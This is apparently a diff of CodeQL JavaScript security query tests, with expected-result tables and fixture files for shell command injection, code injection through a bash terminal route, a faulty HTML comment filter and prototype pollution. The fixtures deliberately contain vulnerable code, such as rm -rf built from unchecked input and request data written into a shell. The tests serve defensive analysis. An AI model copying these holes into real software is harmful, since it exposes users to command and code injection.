| lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name |
| lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name |
@@ -724,6 +732,7 @@ edges
| lib/lib.js:54:13:54:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:54:25:54:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:55:2:55:14 | cp.exec(cmd1) | shell command |
| lib/lib.js:57:13:57:28 | "rm -rf " + name | lib/lib.js:53:33:53:36 | name | lib/lib.js:57:25:57:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:53:33:53:36 | name | library input | lib/lib.js:59:3:59:14 | cp.exec(cmd) | shell command |
| lib/lib.js:65:10:65:25 | "rm -rf " + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:65:22:65:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:65:2:65:26 | cp.exec ... + name) | shell command |
| lib/lib.js:69:10:69:47 | "for fo ... la end" | lib/lib.js:64:41:64:44 | name | lib/lib.js:69:27:69:30 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:69:2:69:48 | cp.exec ... a end") | shell command |
| lib/lib.js:71:10:71:31 | "cat /f ... + name | lib/lib.js:64:41:64:44 | name | lib/lib.js:71:28:71:31 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:71:2:71:32 | cp.exec ... + name) | shell command |
| lib/lib.js:73:10:73:31 | "cat \\" ... + "\\"" | lib/lib.js:64:41:64:44 | name | lib/lib.js:73:21:73:24 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:73:2:73:32 | cp.exec ... + "\\"") | shell command |
| lib/lib.js:75:10:75:29 | "cat '" + name + "'" | lib/lib.js:64:41:64:44 | name | lib/lib.js:75:20:75:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:64:41:64:44 | name | library input | lib/lib.js:75:2:75:30 | cp.exec ... + "'") | shell command |
@@ -742,6 +751,7 @@ edges
| lib/lib.js:149:12:149:27 | "rm -rf " + name | lib/lib.js:148:37:148:40 | name | lib/lib.js:149:24:149:27 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:148:37:148:40 | name | library input | lib/lib.js:152:2:152:23 | cp.spaw ... gs, cb) | shell command |
| lib/lib.js:161:13:161:28 | "rm -rf " + name | lib/lib.js:155:38:155:41 | name | lib/lib.js:161:25:161:28 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:155:38:155:41 | name | library input | lib/lib.js:163:2:167:2 | cp.spaw ... t' }\\n\\t) | shell command |
| lib/lib.js:173:10:173:23 | "fo \| " + name | lib/lib.js:170:41:170:44 | name | lib/lib.js:173:20:173:23 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:170:41:170:44 | name | library input | lib/lib.js:173:2:173:24 | cp.exec ... + name) | shell command |
| lib/lib.js:181:15:181:52 | "'" + n ... ) + "'" | lib/lib.js:177:38:177:41 | name | lib/lib.js:181:21:181:46 | name.re ... "'\\''") | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command |
| lib/lib.js:182:10:182:27 | "rm -rf " + broken | lib/lib.js:177:38:177:41 | name | lib/lib.js:182:22:182:27 | broken | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:177:38:177:41 | name | library input | lib/lib.js:182:2:182:28 | cp.exec ... broken) | shell command |
| lib/lib.js:187:10:187:25 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:187:22:187:25 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:187:2:187:26 | cp.exec ... + name) | shell command |
| lib/lib.js:190:11:190:26 | "rm -rf " + name | lib/lib.js:186:34:186:37 | name | lib/lib.js:190:23:190:26 | name | This string concatenation which depends on $@ is later used in a $@. | lib/lib.js:186:34:186:37 | name | library input | lib/lib.js:190:3:190:27 | cp.exec ... + name) | shell command |

2
javascript/ql/test/query-tests/Security/CWE-078/UnsafeShellCommandConstruction/lib/lib.js
View File

@@ -66,7 +66,7 @@ module.exports.stringConcat = function (name) {
cp.exec(name); // OK.
cp.exec("for foo in (" + name + ") do bla end"); // OK.
cp.exec("for foo in (" + name + ") do bla end"); // NOT OK.
cp.exec("cat /foO/BAR/" + name) // NOT OK.

10
javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/CodeInjection.expected
View File

@@ -84,6 +84,11 @@ nodes
| express.js:26:17:26:35 | req.param("wobble") |
| express.js:27:34:27:38 | taint |
| express.js:27:34:27:38 | taint |
| express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:43:15:43:19 | taint |
| express.js:43:15:43:19 | taint |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
@@ -216,6 +221,10 @@ edges
| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code |
| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code |
| react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted |
@@ -311,6 +320,7 @@ edges
| express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | express.js:19:37:19:70 | req.par ... odule") | This code execution depends on a $@. | express.js:19:37:19:70 | req.par ... odule") | user-provided value |
| express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | express.js:21:19:21:48 | req.par ... ntext") | This code execution depends on a $@. | express.js:21:19:21:48 | req.par ... ntext") | user-provided value |
| express.js:27:34:27:38 | taint | express.js:26:17:26:35 | req.param("wobble") | express.js:27:34:27:38 | taint | This code execution depends on a $@. | express.js:26:17:26:35 | req.param("wobble") | user-provided value |
| express.js:43:15:43:19 | taint | express.js:34:17:34:35 | req.param("wobble") | express.js:43:15:43:19 | taint | This code execution depends on a $@. | express.js:34:17:34:35 | req.param("wobble") | user-provided value |
| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code | This code execution depends on a $@. | module.js:9:16:9:29 | req.query.code | user-provided value |
| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code | This code execution depends on a $@. | module.js:11:17:11:30 | req.query.code | user-provided value |
| react-native.js:8:32:8:38 | tainted | react-native.js:7:17:7:33 | req.param("code") | react-native.js:8:32:8:38 | tainted | This code execution depends on a $@. | react-native.js:7:17:7:33 | req.param("code") | user-provided value |

9
javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/HeuristicSourceCodeInjection.expected
View File

@@ -88,6 +88,11 @@ nodes
| express.js:26:17:26:35 | req.param("wobble") |
| express.js:27:34:27:38 | taint |
| express.js:27:34:27:38 | taint |
| express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:34:17:34:35 | req.param("wobble") |
| express.js:43:15:43:19 | taint |
| express.js:43:15:43:19 | taint |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
| module.js:9:16:9:29 | req.query.code |
@@ -224,6 +229,10 @@ edges
| express.js:26:9:26:35 | taint | express.js:27:34:27:38 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:26:17:26:35 | req.param("wobble") | express.js:26:9:26:35 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:9:34:35 | taint | express.js:43:15:43:19 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| express.js:34:17:34:35 | req.param("wobble") | express.js:34:9:34:35 | taint |
| module.js:9:16:9:29 | req.query.code | module.js:9:16:9:29 | req.query.code |
| module.js:11:17:11:30 | req.query.code | module.js:11:17:11:30 | req.query.code |
| react-native.js:7:7:7:33 | tainted | react-native.js:8:32:8:38 | tainted |

15
javascript/ql/test/query-tests/Security/CWE-094/CodeInjection/express.js
View File

@@ -28,3 +28,18 @@ app.get('/other/path', function(req, res) {
cp.execFileSync('node', ['-e', `console.log(${JSON.stringify(taint)})`]); // OK
});
const pty = require('node-pty');
app.get('/terminal', function(req, res) {
const taint = req.param("wobble");
const shell = pty.spawn('bash', [], {
name: 'xterm-color',
cols: 80,
rows: 30,
cwd: process.env.HOME,
env: process.env
});
shell.write(taint); // NOT OK
});

1
javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/BadTagFilter.expected
View File

@@ -15,3 +15,4 @@
| tst.js:20:3:20:57 | (<[a-z\\/!$]("[^"]*"\|'[^']*'\|[^'">])*>\|<!(--.*?--\\s*)+>) | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 3 and comments ending with --!> are matched with capture group 1. |
| tst.js:21:6:21:249 | <(?:(?:!--([\\w\\W]*?)-->)\|(?:!\\[CDATA\\[([\\w\\W]*?)\\]\\]>)\|(?:!DOCTYPE([\\w\\W]*?)>)\|(?:\\?([^\\s\\/<>]+) ?([\\w\\W]*?)[?/]>)\|(?:\\/([A-Za-z][A-Za-z0-9\\-_\\:\\.]*)>)\|(?:([A-Za-z][A-Za-z0-9\\-_\\:\\.]*)((?:\\s+[^"'>]+(?:(?:"[^"]*")\|(?:'[^']*')\|[^>]*))*\|\\/\|\\s+)>)) | This regular expression only parses --> (capture group 1) and not --!> as an HTML comment end tag. |
| tst.js:22:6:22:33 | <!--([\\w\\W]*?)-->\|<([^>]*?)> | Comments ending with --> are matched differently from comments ending with --!>. The first is matched with capture group 1 and comments ending with --!> are matched with capture group 2. |
| tst.js:31:6:31:8 | --> | This regular expression only parses --> and not --!> as a HTML comment end tag. |

7
javascript/ql/test/query-tests/Security/CWE-116/BadTagFilter/tst.js
View File

@@ -26,3 +26,10 @@ doFilters(filters)
var strip = '<script([^>]*)>([\\S\\s]*?)<\/script([^>]*)>'; // OK - it's used with the ignorecase flag
new RegExp(strip, 'gi');
var moreFilters = [
/-->/g, // NOT OK - doesn't match --!>
/^>|^->|<!--|-->|--!>|<!-$/g, // OK
];
doFilters(moreFilters);

15
javascript/ql/test/query-tests/Security/CWE-770/MissingRateLimit/MissingRateLimitingGood.js
View File

@@ -1,18 +1,17 @@
var express = require('express');
var express = require("express");
var app = express();
// set up rate limiter: maximum of five requests per minute
var RateLimit = require('express-rate-limit');
var limiter = new RateLimit({
windowMs: 1*60*1000, // 1 minute
max: 5
var RateLimit = require("express-rate-limit");
var limiter = RateLimit({
windowMs: 1 * 60 * 1000, // 1 minute
max: 5,
});
// apply rate limiter to all requests
app.use(limiter);
app.get('/:path', function(req, res) {
app.get("/:path", function (req, res) {
let path = req.params.path;
if (isValidPath(path))
res.sendFile(path);
if (isValidPath(path)) res.sendFile(path);
});

12
javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/PrototypePollutingAssignment.expected
View File

@@ -117,6 +117,12 @@ nodes
| lib.js:128:9:128:20 | obj[path[0]] |
| lib.js:128:13:128:16 | path |
| lib.js:128:13:128:19 | path[0] |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path |
| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:2:7:2:10 | path |
| otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] |
| sublib/other.js:5:28:5:31 | path |
| sublib/other.js:5:28:5:31 | path |
| sublib/other.js:6:7:6:18 | obj[path[0]] |
@@ -295,6 +301,11 @@ edges
| lib.js:128:13:128:16 | path | lib.js:128:13:128:19 | path[0] |
| lib.js:128:13:128:19 | path[0] | lib.js:128:9:128:20 | obj[path[0]] |
| lib.js:128:13:128:19 | path[0] | lib.js:128:9:128:20 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:7:2:10 | path |
| otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:7:2:10 | path |
| otherlib/src/otherlibimpl.js:2:7:2:10 | path | otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] |
| otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| otherlib/src/otherlibimpl.js:2:7:2:13 | path[0] | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] |
| sublib/other.js:5:28:5:31 | path | sublib/other.js:6:11:6:14 | path |
| sublib/other.js:5:28:5:31 | path | sublib/other.js:6:11:6:14 | path |
| sublib/other.js:6:11:6:14 | path | sublib/other.js:6:11:6:17 | path[0] |
@@ -367,6 +378,7 @@ edges
| lib.js:108:3:108:10 | obj[one] | lib.js:104:13:104:21 | arguments | lib.js:108:3:108:10 | obj[one] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:104:13:104:21 | arguments | library input |
| lib.js:119:13:119:24 | obj[path[0]] | lib.js:118:29:118:32 | path | lib.js:119:13:119:24 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:118:29:118:32 | path | library input |
| lib.js:128:9:128:20 | obj[path[0]] | lib.js:127:14:127:17 | path | lib.js:128:9:128:20 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | lib.js:127:14:127:17 | path | library input |
| otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | otherlib/src/otherlibimpl.js:1:37:1:40 | path | otherlib/src/otherlibimpl.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | otherlib/src/otherlibimpl.js:1:37:1:40 | path | library input |
| sublib/other.js:6:7:6:18 | obj[path[0]] | sublib/other.js:5:28:5:31 | path | sublib/other.js:6:7:6:18 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/other.js:5:28:5:31 | path | library input |
| sublib/sub.js:2:3:2:14 | obj[path[0]] | sublib/sub.js:1:37:1:40 | path | sublib/sub.js:2:3:2:14 | obj[path[0]] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | sublib/sub.js:1:37:1:40 | path | library input |
| tst.js:8:5:8:17 | object[taint] | tst.js:5:24:5:37 | req.query.data | tst.js:8:5:8:17 | object[taint] | This assignment may alter Object.prototype if a malicious '__proto__' string is injected from $@. | tst.js:5:24:5:37 | req.query.data | user controlled input |

4
javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/package.json Normal file
View File

@@ -0,0 +1,4 @@
{
"name": "otherlib",
"main": "dist/otherlibimpl.node.cjs.js"
}

3
javascript/ql/test/query-tests/Security/CWE-915/PrototypePollutingAssignment/otherlib/src/otherlibimpl.js Normal file
View File

@@ -0,0 +1,3 @@
module.exports.set = function (obj, path, value) {
obj[path[0]][path[1]] = value; // NOT OK
}